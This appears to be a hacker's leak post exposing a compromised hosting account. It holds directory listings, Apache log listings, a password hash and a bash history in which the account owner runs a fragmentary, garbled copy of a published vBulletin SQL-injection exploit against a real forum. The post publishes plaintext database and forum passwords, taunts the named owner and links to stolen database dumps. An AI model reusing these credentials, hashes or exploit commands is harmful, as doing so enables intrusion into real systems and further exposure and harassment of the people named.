  924. 35897444 drwxr-xr-x  6 nopasara nopasara       4096 Jan 16 15:28 bgsecrets.com/
  925. 35947140 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 blog/
  926. 35947141 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 cdn/
  927. 37601282 drwxr-xr-x  2 nopasara nopasara       4096 Oct  4 18:47 cgi-bin/
  928. 35947142 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 cmdb/
  929. 35947139 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 crm/
  930. 36129979 drwxr-xr-x 10 nopasara nopasara       4096 Jan 12  2010 demo/
  931. 35930169 drwxr-xr-x  5 nopasara nopasara       4096 Mar 17 12:35 emeastudio/
  932. 35947143 drwxr-xr-x  2 nopasara nopasara       4096 Feb 19 02:32 eye/
  933. 35897426 -rw-r--r--  1 nopasara nopasara          0 Feb 13 23:17 index.php
  934. 35980080 drwxr-xr-x  6 nopasara nopasara       4096 Jan 28 12:07 ioscompatible.com/
  935. 35897530 -rw-r--r--  1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
  936. 37751973 drwxr-xr-x  3 nopasara nopasara       4096 Jan  6 21:24 png/
  937. 36094784 drwxr-xr-x  8 nopasara nopasara       4096 Mar 20 02:37 securityguy/
  938. 35948620 drwxr-xr-x  5 nopasara nopasara       4096 Mar  5 01:53 studioburgas/
  939. 36241410 drwxr-xr-x  8 nopasara nopasara       4096 Feb  6 15:19 sverdlov.net/
  940. 35964452 drwxr-xr-x  2 nopasara nopasara       4096 Jan 30 23:07 test/
  941. 35930404 drwxr-xr-x  5 nopasara nopasara       4096 Dec 29 21:25 topusahostingproviders.com/
  942. 35914083 drwxr-xr-x  3 nopasara nopasara       4096 Jan  7 01:53 tragedyworld.com/
  943. 35897467 drwxr-xr-x  6 nopasara nopasara       4096 Jan  6 21:25 web/
  944. 36144507 drwxr-xr-x 11 nopasara nopasara       4096 Jul  5  2010 wo/
  945.  
  946.  
  947. nopasara@oss.bg [/home/nopasara/public_html/securityguy]# ls -lia
  948. total 5722468
  949. 36094784 drwxr-xr-x  8 nopasara nopasara       4096 Mar 20 02:37 ./
  950. 35897352 drwxr-x--- 22 nopasara nobody         4096 Feb 28 01:31 ../
  951. 36094811 -rw-------  1 nopasara nopasara         16 Mar  7 01:54 .ftpquota
  952. 36094012 -rw-r--r--  1 nopasara nopasara       3987 Mar  2 01:23 .htaccess
  953. 37093607 drwxr-xr-x  2 nopasara nopasara       4096 Jan 26  2010 cgi-bin/
  954. 36094022 -rw-r--r--  1 nopasara nopasara 1468465152 Nov 21  2009 dni.avi
  955. 36094931 -rw-r--r--  1 nopasara nopasara        397 Mar  2 01:21 index.php
  956. 37322753 drwxr-xr-x  7 nopasara nopasara       4096 Nov  9  2009 leech/
  957. 36094114 -rw-r--r--  1 nopasara nopasara      15606 Mar  2 01:21 license.txt
  958. 36094164 -rw-r--r--  1 nopasara nopasara        210 Jan  7 02:58 php.ini
  959. 36094115 -rw-r--r--  1 nopasara nopasara       9200 Mar  2 01:21 readme.html
  960. 36094934 -rw-r--r--  1 nopasara nopasara         27 Sep 27  2009 robots.txt
  961. 36094031 -rw-r--r--  1 nopasara nopasara        388 Dec  1  2009 start.png
  962. 36978690 drwxr-xr-x  3 nopasara nopasara       4096 Dec  1  2009 task/
  963. 36094935 -rw-r--r--  1 nopasara nopasara    5612818 Sep 27  2009 webtech_2009.tar.gz
  964. 36094061 -rw-r--r--  1 nopasara nopasara       4337 Mar  2 01:21 wp-activate.php
  965. 36094786 drwxr-xr-x  9 nopasara nopasara       4096 Mar  2 01:21 wp-admin/
  966. 36095227 -rw-r--r--  1 nopasara nopasara      40283 Mar  2 01:21 wp-app.php
  967. 36095228 -rw-r--r--  1 nopasara nopasara        226 Mar  2 01:21 wp-atom.php
  968. 36095229 -rw-r--r--  1 nopasara nopasara        274 Mar  2 01:21 wp-blog-header.php
  969. 36095230 -rw-r--r--  1 nopasara nopasara       3931 Mar  2 01:21 wp-comments-post.php
  970. 36095231 -rw-r--r--  1 nopasara nopasara        244 Mar  2 01:21 wp-commentsrss2.php
  971. 36095232 -rw-r--r--  1 nopasara nopasara       3177 Mar  2 01:21 wp-config-sample.php
  972. 36095233 -rw-r--r--  1 nopasara nopasara       1742 Mar  2 01:21 wp-config.php
  973. 36094792 drwxr-xr-x  7 nopasara nopasara       4096 Mar  2 01:25 wp-content/
  974. 36095718 -rw-r--r--  1 nopasara nopasara       1255 Mar  2 01:21 wp-cron.php
  975. 36095719 -rw-r--r--  1 nopasara nopasara        246 Mar  2 01:21 wp-feed.php
  976. 36094858 drwxr-xr-x  8 nopasara nopasara       4096 Mar  2 01:21 wp-includes/
  977. 36096099 -rw-r--r--  1 nopasara nopasara       1997 Mar  2 01:21 wp-links-opml.php
  978. 36096100 -rw-r--r--  1 nopasara nopasara       2453 Mar  2 01:21 wp-load.php
  979. 36096101 -rw-r--r--  1 nopasara nopasara      27787 Mar  2 01:21 wp-login.php
  980. 36096102 -rw-r--r--  1 nopasara nopasara       7774 Mar  2 01:21 wp-mail.php
  981. 36096103 -rw-r--r--  1 nopasara nopasara        494 Mar  2 01:21 wp-pass.php
  982. 36094141 -rw-r--r--  1 nopasara nopasara     110415 Mar  2 01:21 wp-pdf.php
  983. 36096104 -rw-r--r--  1 nopasara nopasara        224 Mar  2 01:21 wp-rdf.php
  984. 36096105 -rw-r--r--  1 nopasara nopasara        334 Mar  2 01:21 wp-register.php
  985. 36096106 -rw-r--r--  1 nopasara nopasara        224 Mar  2 01:21 wp-rss.php
  986. 36096107 -rw-r--r--  1 nopasara nopasara        226 Mar  2 01:21 wp-rss2.php
  987. 36096108 -rw-r--r--  1 nopasara nopasara       9655 Mar  2 01:21 wp-settings.php
  988. 36094025 -rw-r--r--  1 nopasara nopasara      18644 Mar  2 01:21 wp-signup.php
  989. 36096109 -rw-r--r--  1 nopasara nopasara       3702 Mar  2 01:21 wp-trackback.php
  990. 36096110 -rw-r--r--  1 nopasara nopasara       3210 Mar  2 01:21 xmlrpc.php
  991. 36094150 -rw-r--r--  1 nopasara nopasara 4379590656 Sep 10  2010 xorred.iso
  992.  
  993.  
  994. nopasara@oss.bg [/home/nopasara]# cat .bash_history
  995. #1263692240
  996. cd public_html/
  997. #1263692243
  998. test.php
  999. #1263692248
  1000. php test.php
  1001. #1263692260
  1002. php test.php <?php
  1003. #1263692260
  1004. print_r('
  1005. -----------------------------------------------------------------------------
  1006. vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
  1007. escalation by session hijacking exploit
  1008. by rgod
  1009. mail: retrog at alice dot it
  1010. site: http://retrogod.altervista.org
  1011.  
  1012. Works regardless of php.ini settings, you need a Super Moderator account
  1013. to copy posts among threads, to be launched while admin is logged in to
  1014. the control panel, this will give you full admin privileges
  1015. note: this will flood the forum with empty threads even!
  1016. -----------------------------------------------------------------------------
  1017. ');
  1018. #1263692260
  1019. if ($argc<7) {
  1020. #1263692260
  1021. print_r('
  1022. -----------------------------------------------------------------------------
  1023. Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
  1024. host:      target server (ip/hostname)
  1025. path:      path to vbulletin
  1026. user/pass: you need a moderator account
  1027. forumid:   existing forum
  1028. postid:    existing post
  1029. Options:
  1030.  -p[port]:    specify a port other than 80
  1031.  -P[ip:port]: specify a proxy
  1032. Example:
  1033. php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
  1034. php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
  1035. -----------------------------------------------------------------------------
  1036. ');
  1037. #1263692260
  1038. die;
  1039. #1263692260
  1040. }
  1041. #1263692260
  1042. /*
  1043. #1263692260
  1044. vulnerable code in inlinemod.php near lines 185-209:
  1045. #1263692260
  1046. ...
  1047. #1263692260
  1048.  
  1049. #1263692260
  1050. ->GPC['postids']);
  1051. #1263692260
  1052. dex => $postid)
  1053. #1263692260
  1054. dex"] != intval($postid))
  1055. {
  1056. unset($postids["$index"]);
  1057. }
  1058. }
  1059.  
  1060. if (empty($postids))
  1061. {
  1062. #1263692279
  1063. php test.php
  1064. #1263692305
  1065. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  1066. #1263692308
  1067. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  1068. #1263692321
  1069. php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
  1070. #1263692381
  1071. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  1072. #1263692470
  1073. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  1074. #1263692489
  1075. Administrator
  1076. #1263692493
  1077. Administrator
  1078. #1263692496
  1079. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  1080. #1263692539
  1081. cd ..
  1082. #1263692540
  1083. ls
  1084. #1263692547
  1085. rm .bash_history
  1086. #1263692551
  1087. cat .bash_h
  1088. #1263692557
  1089. exit
  1090. #1263831540
  1091. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
  1092. #1263831932
  1093. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
  1094. #1263833103
  1095. exit
  1096. #1263832465
  1097. ls -la
  1098. #1263832469
  1099. ls -la
  1100. #1263832491
  1101. vim .bash_history
  1102. #1263832552
  1103. mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
  1104. #1263832751
  1105. mysql --help|grep charset
  1106. #1263832754
  1107. mysql --help|grep char
  1108. #1263832908
  1109. cd public_html/
  1110. #1263832909
  1111. ls
  1112. #1263832912
  1113. cd sverdlov.net/
  1114. #1263832912
  1115. ls
  1116. #1263832923
  1117. vim wp-config.php
  1118. #1263837320
  1119. logou
  1120. #1263837322
  1121. logout
  1122. uname -a;w;id
  1123. cd /home/nopasara
  1124. ls -l
  1125. du -hs .
  1126. cd /home/nopasara
  1127. ls -lia
  1128.  
  1129.  
  1130. >> LOL, You're doing it wrong, idiot.
  1131.  
  1132. nopasara@oss.bg [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
  1133. leech:204VnKl0pmERM
  1134.  
  1135.  
  1136. nopasara@oss.bg [/home/nopasara]# ls -l docs
  1137. total 36044
  1138. drwxr-xr-x  2 nopasara nopasara    4096 Apr 12  2009 ./
  1139. drwx--x--x 18 nopasara nopasara    4096 Mar 20 03:01 ../
  1140. -rw-r--r--  1 nopasara nopasara 1589323 Apr 12  2009 NIST-SP800-42.pdf
  1141. -rw-------  1 nopasara nopasara 1224696 Jan 14  2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
  1142. -rw-------  1 nopasara nopasara  925291 Jan 14  2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
  1143. -rw-------  1 nopasara nopasara  903941 Jan 14  2009 covering_the_tracks_on_mac_os_x_leopard_32993
  1144. -rw-------  1 nopasara nopasara 1000759 Jan 14  2009 current_issues_in_dns_32988
  1145. -rw-------  1 nopasara nopasara  883280 Jan 14  2009 data_carving_concepts_32969
  1146. -rw-------  1 nopasara nopasara  504518 Jan 14  2009 detecting_and_preventing_anonymous_proxy_usage_32943
  1147. -rw-------  1 nopasara nopasara 1856536 Jan 14  2009 document_metadata_the_silent_killer_32974
  1148. -rw-------  1 nopasara nopasara 3193150 Jan 14  2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
  1149. -rw-------  1 nopasara nopasara  825947 Jan 14  2009 evtx_and_windows_event_logging_32949
  1150. -rw-------  1 nopasara nopasara 6815322 Jan 14  2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
  1151. -rw-------  1 nopasara nopasara 2014858 Jan 14  2009 human_being_firewall_32998
  1152. -rw-------  1 nopasara nopasara  631031 Jan 14  2009 intel_ixp_network_processor_based_intrusion_detection_32919
  1153. -rw-------  1 nopasara nopasara  343988 Jan 14  2009 intrusion_detection_likelihood_a_riskbased_approach_32938
  1154. -rw-------  1 nopasara nopasara  516554 Jan 14  2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
  1155. -rw-------  1 nopasara nopasara  426055 Jan 14  2009 manager_bg_2009.pdf
  1156. -rw-------  1 nopasara nopasara  461473 Jan 14  2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
  1157. -rw-------  1 nopasara nopasara  808979 Jan 14  2009 net_framework_rootkits_backdoors_inside_your_framework_32954
  1158. -rw-------  1 nopasara nopasara  981363 Jan 14  2009 os_and_application_fingerprinting_techniques_32923
  1159. -rw-------  1 nopasara nopasara 1083363 Jan 14  2009 paper32988.pdf
  1160. -rw-------  1 nopasara nopasara 1574638 Jan 14  2009 security_considerations_for_avaya_ess_implementation_32984
  1161. -rw-------  1 nopasara nopasara  485204 Jan 14  2009 security_incident_handling_in_small_organizations_32979
  1162. -rw-------  1 nopasara nopasara  482489 Jan 14  2009 skype_a_practical_security_analysis_32918
  1163. -rw-------  1 nopasara nopasara  470634 Jan 14  2009 social_engineering_manipulating_the_source_32914
  1164. -rw-------  1 nopasara nopasara  732651 Jan 14  2009 the_importance_of_security_awareness_training_33013
  1165. -rw-------  1 nopasara nopasara 1143981 Jan 14  2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
  1166. -rw-------  1 nopasara nopasara 4844265 Jan 14  2009 valsmith_dquist_hacking_malware.pdf
  1167.  
  1168.  
  1169. nopasara@oss.bg [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
  1170. total 128288
  1171. drwxr-x---   2 root nopasara      4096 Feb 28 14:26 ./
  1172. drwx--x--x 654 root wheel       765952 Mar 20 03:03 ../
  1173. -rw-r-----   2 root nopasara     39096 Mar 20 01:19 bgsecrets.oss.bg
  1174. -rw-r-----   2 root nopasara    294111 Jul 10  2009 blog.nopasara.bg
  1175. -rw-r-----   2 root nopasara      6791 Mar 16 21:06 blog.oss.bg
  1176. -rw-r-----   2 root nopasara     15280 Mar 16 21:22 cdn.oss.bg
  1177. -rw-r-----   2 root nopasara    927221 Jul  4  2009 cmdb.nopasara.bg
  1178. -rw-r-----   2 root nopasara         0 Jan 31  2010 cmdb.oss.bg
  1179. -rw-r-----   2 root nopasara    227423 Jul  4  2009 crm.nopasara.bg
  1180. -rw-r-----   2 root nopasara         0 Jan 31  2010 crm.oss.bg
  1181. -rw-r-----   2 root nopasara    101328 Mar 20 02:10 demo.oss.bg
  1182. -rw-r-----   2 root nopasara   2399652 Mar 20 01:57 emeastudio.oss.bg
  1183. -rw-r-----   2 root nopasara         0 Jan 31 00:25 eye.oss.bg
  1184. -rw-r-----   2 root nopasara         0 Aug 31  2009 ftp.nopasara.bg-ftp_log
  1185. -rw-r-----   2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
  1186. -rw-r-----   2 root nopasara     29481 Dec 28  2009 hipopotuk.oss.bg
  1187. -rw-r-----   2 root nopasara     80008 Mar 20 01:44 ioscompatible.oss.bg
  1188. -rw-r-----   2 root nopasara    121645 Oct  3 13:24 logostudio.oss.bg
  1189. -rw-r-----   2 root nopasara         0 Aug 31  2009 nopasara.bg
  1190. -rw-r-----   2 root nopasara     39153 Sep 16  2009 nopasara.oss.bg
  1191. -rw-r-----   2 root nopasara         0 Dec 10  2008 nopasaran.bg
  1192. -rw-r-----   2 root nopasara    259906 Mar 20 02:54 oss.bg
  1193. -rw-r-----   2 root nopasara    104114 Feb  5 11:21 osseu.oss.bg
  1194. -rw-r-----   2 root nopasara         0 Jun 30  2009 play.nopasara.bg
  1195. -rw-r-----   2 root nopasara         0 Jul 10  2009 play.oss.bg
  1196. -rw-r-----   2 root nopasara  10374402 Mar 20 03:02 securityguy.oss.bg
  1197. -rw-r--r--   2 root root        375448 Jul 28  2009 studio.oss.bg
  1198. -rw-r-----   2 root nopasara     74486 Mar 19 20:47 studioburgas.oss.bg
  1199. -rw-r-----   2 root nopasara    729044 Jul  4  2009 support.nopasara.bg
  1200. -rw-r-----   2 root nopasara         0 Jul 10  2009 support.oss.bg
  1201. -rw-r-----   2 root nopasara   2114965 Mar 20 02:54 sverdlov.oss.bg
  1202. -rw-r-----   2 root nopasara     72848 Mar 20 02:42 test.oss.bg
  1203. -rw-r-----   2 root nopasara         0 Jan 31 00:25 topusahostingproviders.oss.bg
  1204. -rw-r-----   2 root nopasara         0 Jan 31 00:25 tragedyworld.oss.bg
  1205. -rw-r-----   2 root nopasara    141532 Mar 20 02:53 web.oss.bg
  1206. -rw-r-----   2 root nopasara       140 Aug  1  2009 weboffice.oss.bg
  1207. -rw-r-----   2 root nopasara    137076 Mar 16 02:38 wo.oss.bg
  1208.  
  1209.  
  1210. >> Check the URL for database dumps, etc.
  1211.  
  1212.  
  1213.  
  1214.  
  1215. Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.
  1216.  
  1217. Here's the URL for the various dumps -
  1218. http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html
  1219.  
  1220. Get back to pr0n4all@hush.ai for non-published details, packet captures, some more database dumps, etc.